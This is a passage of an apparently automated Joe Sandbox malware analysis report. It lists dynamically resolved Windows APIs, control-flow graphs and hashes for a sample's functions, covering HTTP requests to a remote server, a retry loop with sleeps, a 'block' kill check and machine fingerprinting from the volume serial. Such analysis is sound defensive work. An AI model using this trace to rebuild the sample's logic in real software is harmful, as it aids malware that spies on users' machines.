                              • GetProcAddress.KERNEL32(75900000,013BCB38), ref: 009F9EA6
                              • GetProcAddress.KERNEL32(75900000,013BCDD8), ref: 009F9EBE
                              • GetProcAddress.KERNEL32(75900000,013BCD00), ref: 009F9ED6
                              • GetProcAddress.KERNEL32(75900000,013BCD30), ref: 009F9EEF
                              • GetProcAddress.KERNEL32(75900000,013BCD48), ref: 009F9F07
                              • GetProcAddress.KERNEL32(75900000,013BCD60), ref: 009F9F1F
                              • GetProcAddress.KERNEL32(75900000,013BCD78), ref: 009F9F38
                              • GetProcAddress.KERNEL32(75900000,013B99D8), ref: 009F9F50
                              • GetProcAddress.KERNEL32(75900000,013BCC88), ref: 009F9F68
                              • GetProcAddress.KERNEL32(75900000,013BCBC8), ref: 009F9F81
                              • GetProcAddress.KERNEL32(75900000,013A6580), ref: 009F9F99
                              • GetProcAddress.KERNEL32(75900000,013BCC10), ref: 009F9FB1
                              • GetProcAddress.KERNEL32(75900000,013A65A0), ref: 009F9FCA
                              • GetProcAddress.KERNEL32(75900000,013BCAF0), ref: 009F9FE2
                              • GetProcAddress.KERNEL32(75900000,013BCB50), ref: 009F9FFA
                              • GetProcAddress.KERNEL32(75900000,013A65C0), ref: 009FA013
                              • GetProcAddress.KERNEL32(75900000,013A6660), ref: 009FA02B
                              • LoadLibraryA.KERNEL32(013BCCB8,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA03D
                              • LoadLibraryA.KERNEL32(013BCB68,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA04E
                              • LoadLibraryA.KERNEL32(013BCC28,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA060
                              • LoadLibraryA.KERNEL32(013BCC58,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA072
                              • LoadLibraryA.KERNEL32(013BCCA0,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA083
                              • LoadLibraryA.KERNEL32(013BCCD0,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA095
                              • LoadLibraryA.KERNEL32(013BCE98,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA0A7
                              • LoadLibraryA.KERNEL32(013BCE50,?,009F5CA3,00A00AEB,?,?,?,?,?,?,?,?,?,?,00A00AEA,00A00AE3), ref: 009FA0B8
                              • GetProcAddress.KERNEL32(75FD0000,013A66A0), ref: 009FA0DA
                              • GetProcAddress.KERNEL32(75FD0000,013BCE80), ref: 009FA0F2
                              • GetProcAddress.KERNEL32(75FD0000,013B89A0), ref: 009FA10A
                              • GetProcAddress.KERNEL32(75FD0000,013BCEF8), ref: 009FA123
                              • GetProcAddress.KERNEL32(75FD0000,013A67E0), ref: 009FA13B
                              • GetProcAddress.KERNEL32(734B0000,013AB158), ref: 009FA160
                              • GetProcAddress.KERNEL32(734B0000,013A6940), ref: 009FA179
                              • GetProcAddress.KERNEL32(734B0000,013AB180), ref: 009FA191
                              • GetProcAddress.KERNEL32(734B0000,013BCE08), ref: 009FA1A9
                              • GetProcAddress.KERNEL32(734B0000,013BCF70), ref: 009FA1C2
                              • GetProcAddress.KERNEL32(734B0000,013A6820), ref: 009FA1DA
                              • GetProcAddress.KERNEL32(734B0000,013A67C0), ref: 009FA1F2
                              • GetProcAddress.KERNEL32(734B0000,013BCF10), ref: 009FA20B
                              • GetProcAddress.KERNEL32(763B0000,013A69C0), ref: 009FA22C
                              • GetProcAddress.KERNEL32(763B0000,013A6960), ref: 009FA244
                              • GetProcAddress.KERNEL32(763B0000,013BCE20), ref: 009FA25D
                              • GetProcAddress.KERNEL32(763B0000,013BCE38), ref: 009FA275
                              • GetProcAddress.KERNEL32(763B0000,013A67A0), ref: 009FA28D
                              • GetProcAddress.KERNEL32(750F0000,013AAF28), ref: 009FA2B3
                              • GetProcAddress.KERNEL32(750F0000,013AAF50), ref: 009FA2CB
                              • GetProcAddress.KERNEL32(750F0000,013BCF88), ref: 009FA2E3
                              • GetProcAddress.KERNEL32(750F0000,013A69A0), ref: 009FA2FC
                              • GetProcAddress.KERNEL32(750F0000,013A6760), ref: 009FA314
                              • GetProcAddress.KERNEL32(750F0000,013AAF78), ref: 009FA32C
                              • GetProcAddress.KERNEL32(75A50000,013BCEB0), ref: 009FA352
                              • GetProcAddress.KERNEL32(75A50000,013A66E0), ref: 009FA36A
                              • GetProcAddress.KERNEL32(75A50000,013B89C0), ref: 009FA382
                              • GetProcAddress.KERNEL32(75A50000,013BCEC8), ref: 009FA39B
                              • GetProcAddress.KERNEL32(75A50000,013BCF28), ref: 009FA3B3
                              • GetProcAddress.KERNEL32(75A50000,013A66C0), ref: 009FA3CB
                              • GetProcAddress.KERNEL32(75A50000,013A6980), ref: 009FA3E4
                              • GetProcAddress.KERNEL32(75A50000,013BCEE0), ref: 009FA3FC
                              • GetProcAddress.KERNEL32(75A50000,013BCF58), ref: 009FA414
                              • GetProcAddress.KERNEL32(75070000,013A6740), ref: 009FA436
                              • GetProcAddress.KERNEL32(75070000,013BCFA0), ref: 009FA44E
                              • GetProcAddress.KERNEL32(75070000,013BCF40), ref: 009FA466
                              • GetProcAddress.KERNEL32(75070000,013BCDF0), ref: 009FA47F
                              • GetProcAddress.KERNEL32(75070000,013BCE68), ref: 009FA497
                              • GetProcAddress.KERNEL32(74E50000,013A6800), ref: 009FA4B8
                              • GetProcAddress.KERNEL32(74E50000,013A69E0), ref: 009FA4D1
                              • GetProcAddress.KERNEL32(75320000,013A6700), ref: 009FA4F2
                              • GetProcAddress.KERNEL32(75320000,013BC838), ref: 009FA50A
                              • GetProcAddress.KERNEL32(6F270000,013A6840), ref: 009FA530
                              • GetProcAddress.KERNEL32(6F270000,013A68E0), ref: 009FA548
                              • GetProcAddress.KERNEL32(6F270000,013A6A00), ref: 009FA560
                              • GetProcAddress.KERNEL32(6F270000,013BC898), ref: 009FA579
                              • GetProcAddress.KERNEL32(6F270000,013A6680), ref: 009FA591
                              • GetProcAddress.KERNEL32(6F270000,013A6900), ref: 009FA5A9
                              • GetProcAddress.KERNEL32(6F270000,013A6860), ref: 009FA5C2
                              • GetProcAddress.KERNEL32(6F270000,013A6A20), ref: 009FA5DA
                              • GetProcAddress.KERNEL32(6F270000,InternetSetOptionA), ref: 009FA5F1
                              • GetProcAddress.KERNEL32(6F270000,HttpQueryInfoA), ref: 009FA607
                              • GetProcAddress.KERNEL32(74E00000,013BC850), ref: 009FA629
                              • GetProcAddress.KERNEL32(74E00000,013B8950), ref: 009FA641
                              • GetProcAddress.KERNEL32(74E00000,013BC8E0), ref: 009FA659
                              • GetProcAddress.KERNEL32(74E00000,013BC988), ref: 009FA672
                              • GetProcAddress.KERNEL32(74DF0000,013A6720), ref: 009FA693
                              • GetProcAddress.KERNEL32(6F9C0000,013BC8F8), ref: 009FA6B4
                              • GetProcAddress.KERNEL32(6F9C0000,013A6880), ref: 009FA6CD
                              • GetProcAddress.KERNEL32(6F9C0000,013BCA30), ref: 009FA6E5
                              • GetProcAddress.KERNEL32(6F9C0000,013BC9E8), ref: 009FA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 5ea91ec6fe6f232418377559b1231c16e090cc97b5e009200987f8770497040b
                              • Instruction ID: 678c28b700bdc4e17f9f938da783d8f63fddecf48a9e823061a75201b277c021
                              • Opcode Fuzzy Hash: 5ea91ec6fe6f232418377559b1231c16e090cc97b5e009200987f8770497040b
                              • Instruction Fuzzy Hash: 32621DB5520200AFC364DFA9EE88B6E37F9F74CB01714852AE609C3A74D7399443DB5A
                              Function 009E6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 9e6280-9e630b call 9fa7a0 call 9e47b0 call 9fa740 InternetOpenA StrCmpCA 1040 9e630d 1033->1040 1041 9e6314-9e6318 1033->1041 1040->1041 1042 9e631e-9e6342 InternetConnectA 1041->1042 1043 9e6509-9e6525 call 9fa7a0 call 9fa800 * 2 1041->1043 1045 9e64ff-9e6503 InternetCloseHandle 1042->1045 1046 9e6348-9e634c 1042->1046 1062 9e6528-9e652d 1043->1062 1045->1043 1048 9e634e-9e6358 1046->1048 1049 9e635a 1046->1049 1051 9e6364-9e6392 HttpOpenRequestA 1048->1051 1049->1051 1053 9e6398-9e639c 1051->1053 1054 9e64f5-9e64f9 InternetCloseHandle 1051->1054 1056 9e639e-9e63bf InternetSetOptionA 1053->1056 1057 9e63c5-9e6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 9e642c-9e644b call 9f8940 1057->1059 1060 9e6407-9e6427 call 9fa740 call 9fa800 * 2 1057->1060 1067 9e644d-9e6454 1059->1067 1068 9e64c9-9e64e9 call 9fa740 call 9fa800 * 2 1059->1068 1060->1062 1071 9e6456-9e6480 InternetReadFile 1067->1071 1072 9e64c7-9e64ef InternetCloseHandle 1067->1072 1068->1062 1076 9e648b 1071->1076 1077 9e6482-9e6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 9e648d-9e64c5 call 9fa9b0 call 9fa8a0 call 9fa800 1077->1080 1080->1071
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                                • Part of subcall function 009E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • InternetOpenA.WININET(00A00DFE,00000001,00000000,00000000,00000000), ref: 009E62E1
                              • StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009E63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009E63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009E63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009E646D
                              • InternetCloseHandle.WININET(00000000), ref: 009E64EF
                              • InternetCloseHandle.WININET(00000000), ref: 009E64F9
                              • InternetCloseHandle.WININET(00000000), ref: 009E6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 6738764e9220ff66569fd5fadbd3e8d869510f36ad84b6af6c03762b8995d9ca
                              • Instruction ID: 91d0916dab8dbb82b43cfc4b3b43324a31129a035219ec9f13ae187e728096da
                              • Opcode Fuzzy Hash: 6738764e9220ff66569fd5fadbd3e8d869510f36ad84b6af6c03762b8995d9ca
                              • Instruction Fuzzy Hash: 98716AB1A00218EBDB24EBA0DC49FEE7778BB44740F108198F20A6B5D0DBB46E85CF51
                              Function 009F5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 9f5510-9f5577 call 9f5ad0 call 9fa820 * 3 call 9fa740 * 4 1106 9f557c-9f5583 1090->1106 1107 9f55d7-9f564c call 9fa740 * 2 call 9e1590 call 9f52c0 call 9fa8a0 call 9fa800 call 9faad0 StrCmpCA 1106->1107 1108 9f5585-9f55b6 call 9fa820 call 9fa7a0 call 9e1590 call 9f51f0 1106->1108 1134 9f5693-9f56a9 call 9faad0 StrCmpCA 1107->1134 1137 9f564e-9f568e call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1107->1137 1124 9f55bb-9f55d2 call 9fa8a0 call 9fa800 1108->1124 1124->1134 1139 9f56af-9f56b6 1134->1139 1140 9f57dc-9f5844 call 9fa8a0 call 9fa820 * 2 call 9e1670 call 9fa800 * 4 call 9f6560 call 9e1550 1134->1140 1137->1134 1142 9f56bc-9f56c3 1139->1142 1143 9f57da-9f585f call 9faad0 StrCmpCA 1139->1143 1271 9f5ac3-9f5ac6 1140->1271 1146 9f571e-9f5793 call 9fa740 * 2 call 9e1590 call 9f52c0 call 9fa8a0 call 9fa800 call 9faad0 StrCmpCA 1142->1146 1147 9f56c5-9f5719 call 9fa820 call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1142->1147 1161 9f5865-9f586c 1143->1161 1162 9f5991-9f59f9 call 9fa8a0 call 9fa820 * 2 call 9e1670 call 9fa800 * 4 call 9f6560 call 9e1550 1143->1162 1146->1143 1250 9f5795-9f57d5 call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1146->1250 1147->1143 1167 9f598f-9f5a14 call 9faad0 StrCmpCA 1161->1167 1168 9f5872-9f5879 1161->1168 1162->1271 1197 9f5a28-9f5a91 call 9fa8a0 call 9fa820 * 2 call 9e1670 call 9fa800 * 4 call 9f6560 call 9e1550 1167->1197 1198 9f5a16-9f5a21 Sleep 1167->1198 1175 9f587b-9f58ce call 9fa820 call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1168->1175 1176 9f58d3-9f5948 call 9fa740 * 2 call 9e1590 call 9f52c0 call 9fa8a0 call 9fa800 call 9faad0 StrCmpCA 1168->1176 1175->1167 1176->1167 1276 9f594a-9f598a call 9fa7a0 call 9e1590 call 9f51f0 call 9fa8a0 call 9fa800 1176->1276 1197->1271 1198->1106 1250->1143 1276->1167
                              APIs
                                • Part of subcall function 009FA820: lstrlen.KERNEL32(009E4F05,?,?,009E4F05,00A00DDE), ref: 009FA82B
                                • Part of subcall function 009FA820: lstrcpy.KERNEL32(00A00DDE,00000000), ref: 009FA885
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5857
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009F51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5228
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F5318
                                • Part of subcall function 009F52C0: lstrlen.KERNEL32(00000000), ref: 009F532F
                                • Part of subcall function 009F52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 009F5364
                                • Part of subcall function 009F52C0: lstrlen.KERNEL32(00000000), ref: 009F5383
                                • Part of subcall function 009F52C0: lstrlen.KERNEL32(00000000), ref: 009F53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 009F5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 9aecec9ec92a63d53ec67bb8c78045c5ed498538714532fc0a2155fc1eadcd61
                              • Instruction ID: 1793064ac08371918f9ec5f491348bfdb9f55309b19248cd61f462aad80bb31b
                              • Opcode Fuzzy Hash: 9aecec9ec92a63d53ec67bb8c78045c5ed498538714532fc0a2155fc1eadcd61
                              • Instruction Fuzzy Hash: 1FE11FB191010CABCB14FBA0DC56FFD737CAF94340F508528B60A66595EF74AE0ACB92
                              Function 009F17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 9f17a0-9f17cd call 9faad0 StrCmpCA 1304 9f17cf-9f17d1 ExitProcess 1301->1304 1305 9f17d7-9f17f1 call 9faad0 1301->1305 1309 9f17f4-9f17f8 1305->1309 1310 9f17fe-9f1811 1309->1310 1311 9f19c2-9f19cd call 9fa800 1309->1311 1313 9f199e-9f19bd 1310->1313 1314 9f1817-9f181a 1310->1314 1313->1309 1316 9f187f-9f1890 StrCmpCA 1314->1316 1317 9f185d-9f186e StrCmpCA 1314->1317 1318 9f1835-9f1844 call 9fa820 1314->1318 1319 9f1913-9f1924 StrCmpCA 1314->1319 1320 9f1932-9f1943 StrCmpCA 1314->1320 1321 9f18f1-9f1902 StrCmpCA 1314->1321 1322 9f1951-9f1962 StrCmpCA 1314->1322 1323 9f1970-9f1981 StrCmpCA 1314->1323 1324 9f18cf-9f18e0 StrCmpCA 1314->1324 1325 9f198f-9f1999 call 9fa820 1314->1325 1326 9f18ad-9f18be StrCmpCA 1314->1326 1327 9f1849-9f1858 call 9fa820 1314->1327 1328 9f1821-9f1830 call 9fa820 1314->1328 1338 9f189e-9f18a1 1316->1338 1339 9f1892-9f189c 1316->1339 1336 9f187a 1317->1336 1337 9f1870-9f1873 1317->1337 1318->1313 1346 9f1926-9f1929 1319->1346 1347 9f1930 1319->1347 1348 9f194f 1320->1348 1349 9f1945-9f1948 1320->1349 1344 9f190e 1321->1344 1345 9f1904-9f1907 1321->1345 1350 9f196e 1322->1350 1351 9f1964-9f1967 1322->1351 1330 9f198d 1323->1330 1331 9f1983-9f1986 1323->1331 1342 9f18ec 1324->1342 1343 9f18e2-9f18e5 1324->1343 1325->1313 1340 9f18ca 1326->1340 1341 9f18c0-9f18c3 1326->1341 1327->1313 1328->1313 1330->1313 1331->1330 1336->1313 1337->1336 1355 9f18a8 1338->1355 1339->1355 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1346->1347 1347->1313 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 009F17C5
                              • ExitProcess.KERNEL32 ref: 009F17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: f294d5e7953545263d91f63749cc2605c4dda2308adf2fa680a2a066a133a7d4
                              • Instruction ID: b19c6192273763d6f89f23733870a63bde05b277c9aaee016ce4bffc8d968caa
                              • Opcode Fuzzy Hash: f294d5e7953545263d91f63749cc2605c4dda2308adf2fa680a2a066a133a7d4
                              • Instruction Fuzzy Hash: 8F5150B4A1420DEFCB04DFA0E994BBE77B5BF44704F104449E605A7380D7B5E992DBA2
                              Function 009F7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 9f7500-9f754a GetWindowsDirectoryA 1357 9f754c 1356->1357 1358 9f7553-9f75c7 GetVolumeInformationA call 9f8d00 * 3 1356->1358 1357->1358 1365 9f75d8-9f75df 1358->1365 1366 9f75fc-9f7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 9f75e1-9f75fa call 9f8d00 1365->1367 1369 9f7619-9f7626 call 9fa740 1366->1369 1370 9f7628-9f7658 wsprintfA call 9fa740 1366->1370 1367->1365 1377 9f767e-9f768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009F7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009F757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F760A
                              • wsprintfA.USER32 ref: 009F7640
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: c6ef856b0e9e7a72246a9ade730e39dc41168ad15550aa4a375156bf7e9e07da
